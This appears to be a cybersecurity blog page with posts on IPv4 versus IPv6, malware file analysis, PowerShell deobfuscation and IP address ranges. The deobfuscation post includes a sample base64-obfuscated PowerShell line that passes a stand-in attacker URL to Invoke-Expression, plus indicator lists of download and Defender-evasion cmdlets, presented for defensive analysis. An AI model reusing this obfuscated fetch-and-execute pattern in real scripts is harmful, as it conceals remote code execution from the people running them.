Category: Cyber Security Tech You Should Know

IPv4 and IPv6 Understanding the Key Differences

🧭 Understanding the Key Differences Between IPv4 and IPv6

Internet Protocol (IP) is the set of rules used to send and receive data over the internet. There are two main versions in use today: IPv4 and IPv6. While IPv4 has served us well for decades, the growing number of connected devices has necessitated the adoption of IPv6. Here’s how they compare:

📌 1. Address Format

IPv4: Uses a 32-bit address format.
Example: 192.168.0.1
IPv6: Uses a 128-bit address format.
Example: 2001:0db8:85a3:0000:0000:8a2e:0370:7334

✅ IPv6 provides a vastly larger address space – enough to give every device on Earth a unique address, and then some.

🌐 2. Number of Addresses

IPv4: Approximately 4.3 billion addresses
IPv6: Roughly 340 undecillion (that’s 340 followed by 36 zeros)

✅ IPv6 solves the address exhaustion problem of IPv4.

🔐 3. Built-in Security

IPv4: Security was optional and added later through IPSec.
IPv6: IPSec is built in as a fundamental component of the protocol.

✅ This makes IPv6 more suitable for secure communications by design.

🚀 4. Configuration

IPv4: Often requires manual configuration or DHCP.
IPv6: Supports stateless address autoconfiguration (SLAAC), allowing devices to automatically configure themselves.

✅ IPv6 simplifies network setup, especially in large-scale environments.

📦 5. Packet Structure & Efficiency

IPv4: More complex due to variable header size and optional fields.
IPv6: Streamlined with a fixed header size, improving processing efficiency.

✅ IPv6 is better optimised for modern networking hardware and high-speed communication.

🔁 6. NAT (Network Address Translation)

IPv4: NAT is commonly used to allow multiple devices to share one public IP.
IPv6: Designed to eliminate the need for NAT due to abundant address space.

✅ This makes peer-to-peer communication and end-to-end connectivity more seamless in IPv6.

📊 7. Compatibility

IPv4: Still the most widely deployed version.
IPv6: Growing in adoption but not yet universally supported.

⚠️ IPv4 and IPv6 are not directly interoperable – dual-stack environments or tunnelling are used during the transition phase.

🧩 Summary Table

Feature	IPv4	IPv6
Address Length	32 bits	128 bits
Address Format	Decimal (e.g., 192.0.2.1)	Hexadecimal (e.g., 2001:db8::1)
Number of Addresses	~4.3 billion	~340 undecillion
NAT Required	Yes	No
Security	Optional (IPSec)	Mandatory (IPSec support built-in)
Auto-configuration	DHCP/manual	SLAAC/DHCPv6
Header Complexity	Complex/variable	Simplified/fixed size
Coexistence with Other IP	Standalone	Needs dual-stack/tunnelling for transition

🧠 Final Thoughts

IPv6 is the future of internet addressing. It brings scalability, efficiency, and security improvements, though IPv4 remains dominant in many environments. As a cybersecurity or infrastructure engineer, understanding both is crucial to designing modern, resilient networks.

Here’s a cool fact that puts IPv6’s address space into perspective:

If every grain of sand on Earth (estimated at ~7.5 x 10¹⁸ grains) were given its own entire internet the size of IPv4 (4.3 billion addresses), IPv6 would still have more than enough addresses left over.

🤯 Why?

IPv6 has 2¹²⁸ addresses — that’s about 340 undecillion. In comparison:

IPv4 offers ~4.3 billion addresses.
IPv6 can assign an entire IPv4 internet to each grain of sand on hundreds of Earths — and still not run out.

That’s how staggeringly vast IPv6’s space is. It’s not just “big” — it’s astronomically big.

30/06/2025

File Analysis

🗂️ How to Perform File Analysis in Cybersecurity

File analysis is the process of inspecting, extracting, and evaluating files to identify malicious behaviour, hidden content, or security policy violations. This is a fundamental skill in threat detection, malware investigation, and digital forensics.

🧠 Why File Analysis Matters

Use Case	Why It’s Important
Malware Detection	Uncover viruses, trojans, or droppers disguised as legitimate files.
Incident Response	Understand what a malicious file did post-infection.
Threat Hunting	Discover suspicious binaries or scripts across an estate.
Compliance	Validate file contents for DLP or policy violations.

🧰 Tools for File Analysis

Tool	Purpose
VirusTotal	Hash- or file-based scanning across dozens of AV engines.
Any.Run / Joe Sandbox	Dynamic behavioural analysis of malware in a sandbox.
YARA	Pattern-matching tool to classify files by malware family or traits.
BinText / ExifTool	Extract strings, metadata, hidden content.
pefile / Detect It Easy (DIE)	Portable Executable (PE) structure analysis.
Python / PowerShell	Custom scripts for decoding or unpacking.
CAPE / Cuckoo Sandbox	Host your own malware sandbox with network monitoring.

🔍 Static vs Dynamic Analysis

Type	Description	When to Use
Static Analysis	Inspect file content without executing it. Includes metadata, strings, hashes.	First stage – quick and safe.
Dynamic Analysis	Run the file in an isolated environment to observe behaviour (e.g. registry edits, C2 calls).	When static is inconclusive.

🧪 Step-by-Step File Analysis Workflow

🔒 1. Isolate the File

Store it in a secure, non-networked VM or container.
Use .zip with passwords to avoid accidental detonation.

🔎 2. Calculate Hashes

sha256sum suspicious_file.exe

Use hashes to search VirusTotal, Hybrid Analysis, etc.

🧬 3. Perform Static Analysis

Use tools like strings, ExifTool, or pefile to inspect:
- Suspicious strings (e.g. URLs, Base64 blobs, IPs)
- Metadata (e.g. author, compile time)
- File structure anomalies

⚙️ 4. Perform Dynamic Analysis

Upload to Any.Run, Joe Sandbox, or run in a local sandbox.
Monitor:
- File modifications
- Registry changes
- Outbound connections
- Process tree

🧰 5. Scan with AV / Threat Intel

Upload to VirusTotal or scan offline with tools like:
- ClamAV
- Windows Defender (via MpCmdRun)
- CrowdStrike or SentinelOne (enterprise)

📜 6. Match with YARA Rules

yara malware_rules.yar suspicious_file.exe

Use threat intel feeds (e.g. Sigma, MISP) or custom rules.

📝 7. Document Findings

Capture indicators of compromise (IOCs): hashes, IPs, domains.
Note TTPs (MITRE techniques) if behaviour was observed.
Classify file (e.g. Dropper → Cobalt Strike beacon → ransomware).

⚠️ Safety Tips

Always analyse in offline, sandboxed environments
Do not double-click unknown files, even if they look benign (e.g. .pdf.exe)
Use read-only mounts or Snapshot VMs to revert post-analysis

📂 Real-World Example

An email attachment invoice.docm was flagged by the EDR.

Hash matched Emotet dropper in VirusTotal

Static: Contained macros + PowerShell stager

Dynamic: Contacted C2 server, downloaded TrickBot payload

Action: Blocked domain, disabled user account, initiated IR

📚 Resources

23/06/2025

Deobfuscate a PowerShell Script with Example

🔎 How to Deobfuscate a PowerShell Script (Cybersecurity Guide)

PowerShell is a powerful scripting language—but its flexibility also makes it a popular choice for attackers. Obfuscated PowerShell is frequently used in phishing payloads, fileless malware, and post-exploitation scripts. This page outlines a safe, methodical approach for deobfuscating and analysing PowerShell scripts.

📌 Why PowerShell Gets Obfuscated

Attackers obfuscate PowerShell to:

Bypass signature-based AV and EDR detection
Conceal intent or evade static analysis
Layer multiple techniques (e.g. base64 + compression + iex)

🛠 Step-by-Step: Deobfuscating a PowerShell Script

🔹 1. Perform Static Analysis First

Before running anything:

Open the script in a text editor (VS Code or Notepad++)
Search for common obfuscation indicators:
- Invoke-Expression (iex)
- FromBase64String, Invoke-WebRequest, Join-String
- Randomised variables or excessive concatenation

🛑 Do not execute the script at this stage.

🔹 2. Beautify the Code

Many malicious scripts are minified or poorly formatted.

✅ Use tools like:

Improve readability before continuing.

🔹 3. Decode Encoded Content

Check for:

Base64 strings ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...)))
Compressed objects (e.g. Gzip or Deflate)
XOR or custom encoding

✅ Tools:

CyberChef (drag-and-drop decode logic)
PowerShell one-liners: powershellCopyEdit$b64 = "encodedstring" [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64))

🔹 4. Isolate `Invoke-Expression` (iex) Blocks

iex is often used to execute hidden payloads. Replace it with Write-Output or Write-Host to reveal the command.

🔄 Example:

$cmd = "Get-Process"
Invoke-Expression $cmd  # ❌
Write-Output $cmd       # ✅

🔹 5. Use a Sandboxed Environment

If you must run part of the script:

Use a non-networked Windows VM
Disable internet access and snapshot the VM
Replace dangerous functions (DownloadFile, Start-Process) with logging outputs

🔐 Tools:

Any.Run or Joe Sandbox
Hyper-V, VMware, VirtualBox (offline)

🔹 6. Script a Recursive Decoder (Optional)

For highly nested obfuscation, write a PowerShell decoder to:

Extract embedded code
Decode base64/XOR recursively
Log intermediate outputs

Sample logic:

function Deobfuscate-Base64Recursively($string) {
    while ($string -match 'Base64') {
        $string = [System.Text.Encoding]::UTF8.GetString(
            [System.Convert]::FromBase64String($string)
        )
        Write-Output $string
    }
}

🔹 7. Identify Malicious Behaviour

After revealing the code:

Look for:
- Invoke-WebRequest (downloads)
- Add-MpPreference, Set-MpPreference (defender evasion)
- Registry modifications for persistence
- Scheduled tasks, WMI, or COM object abuse

Use tools like:

🧪 Common Obfuscation Techniques

Technique	Description
Base64	Encoded commands to hide real content
String Concatenation	Breaking up words like `"In"+"voke-"+"WebRequest"`
Reversed Strings	`'tupnI-teG'[::-1]` becomes `Get-Input`
ASCII Encoding	`[char]65+[char]66` becomes “AB”
Nested `iex` calls	Execution layering: `iex(iex($var))`

🔍 Tools You Should Know

Tool	Use Case
CyberChef	Visual decoding (base64, XOR, gzip)
PowerShell Beautifier	Readable formatting
Any.Run / Joe Sandbox	Safe dynamic analysis
Procmon / Wireshark	Behavioural analysis

✅ Final Tips

Always work offline
Comment out malicious lines before executing any part
Log every decoded stage for later reference
Check decoded commands against known IOCs

🔄 PowerShell Deobfuscation Workflow – Practical Example

This walkthrough shows how to deobfuscate a malicious PowerShell script using safe, repeatable steps.

⚠️ Obfuscated PowerShell Sample

The attacker used string manipulation and Base64 encoding:

$e = 'JAB1AHIAbAA9ACcAaAB0AHQAcAA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAdgBpAGwALgBjAG8AbQAvAHAAZwAnADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAB1AHIAbAA='
$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($e))
Invoke-Expression $decoded

🛠 Deobfuscation Workflow

🔹 Step 1: Review the Script Safely

Paste the code into VS Code or Notepad++.
Note use of:
- $e = '...' → base64
- [System.Text.Encoding]::Unicode.GetString(...)
- Invoke-Expression (aka iex)

🛑 Do not run it yet.

🔹 Step 2: Decode Base64 Safely

We extract and decode the payload manually in a controlled session:

$e = 'JAB1AHIAbAA9ACcAaAB0AHQAcAA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAdgBpAGwALgBjAG8AbQAvAHAAZwAnADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAB1AHIAbAA='
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($e))

Decoded result:

$url='http://malicious.evil.com/pg';Invoke-Expression $url

🔹 Step 3: Neutralise Dangerous Commands

Before running anything, replace Invoke-Expression with Write-Output:

$url='http://malicious.evil.com/pg';Write-Output $url

💡 Now we see what the original command would do without executing it.

🔹 Step 4: Understand Intent

The script downloads another payload from a malicious domain.
It likely fetches a second-stage malware (e.g. RAT, keylogger, etc.).
Check the domain against threat intel feeds like:
- VirusTotal
- AbuseIPDB

🔹 Step 5: Document and Extract IOCs

From this sample, we extract:

IOC URL: http://malicious.evil.com/pg
TTPs: Encoded payload, remote execution, script delivery

📝 Save your decoded version and extracted IOCs for incident response and threat hunting.

📌 Summary

Step	Action
1. Static Review	Open safely in an editor and inspect patterns
2. Decode Base64	Manually decode encoded content
3. Defuse Execution	Replace execution calls with `Write-Output`
4. Analyse Intent	Understand purpose and extract IOCs
5. Document	Record decoded payloads and relevant indicators

21/06/2025

IP Address Ranges

🌐 Understanding IP Address Ranges

An IP address is a unique identifier assigned to each device connected to a network. Understanding how IP ranges are structured helps with network design, security, and troubleshooting.

🔢 IP Address Basics

IPv4 addresses are written in dotted-decimal format: 192.168.1.1
They consist of 4 octets (each 8 bits), totaling 32 bits
Range: 0.0.0.0 to 255.255.255.255

📦 Public vs Private IP Ranges

IP Range	Type	Use Case
`10.0.0.0/8`	Private	Internal networks (enterprise)
`172.16.0.0/12`	Private	Mid-size private networks
`192.168.0.0/16`	Private	Home and small office networks
`100.64.0.0/10`	Carrier-grade NAT	ISPs using NAT for customers
`127.0.0.1`	Loopback	Localhost testing
`169.254.0.0/16`	APIPA	Automatic IP when no DHCP

📌 Private IPs are non-routable over the public internet—they’re meant for internal use behind NAT (e.g. routers, firewalls).

🔍 Public IPs

Assigned by regional internet registries (ARIN, RIPE, APNIC)
Routable over the internet
Examples:
- Google DNS: 8.8.8.8
- Cloudflare DNS: 1.1.1.1
- BBC: 151.101.0.81

🧠 CIDR Notation (Classless Inter-Domain Routing)

CIDR	Subnet Mask	Hosts Available	Example Network
`/8`	`255.0.0.0`	~16 million	`10.0.0.0/8`
`/16`	`255.255.0.0`	~65,000	`192.168.0.0/16`
`/24`	`255.255.255.0`	254	`192.168.1.0/24`
`/30`	`255.255.255.252`	2 (point-to-point)	`192.168.1.4/30`

🚫 Reserved and Special-Purpose Ranges

IP Range	Purpose
`127.0.0.0/8`	Loopback testing (localhost)
`169.254.0.0/16`	Link-local (no DHCP)
`224.0.0.0/4`	Multicast addresses
`240.0.0.0/4`	Reserved for future use
`255.255.255.255`	Broadcast address (local network)

🛡️ Security & Firewall Tips

🔒 Block inbound access to private IP ranges from the internet
🔍 Monitor outbound traffic—private addresses in DNS or HTTP headers can indicate misconfig or malware
🌐 Use NAT to connect private IPs to the internet safely
🚫 Avoid exposing public services on IPs like 0.0.0.0 unless necessary

✅ Summary

Category	Example Range	Notes
Private	`192.168.1.0/24`	Internal only
Public	`8.8.8.8`	Routable, unique
Loopback	`127.0.0.1`	Localhost testing
APIPA	`169.254.x.x`	No DHCP fallback
Multicast	`224.0.0.0/4`	Group-based messaging

💡 Understanding IP ranges is the foundation of secure network design and defence.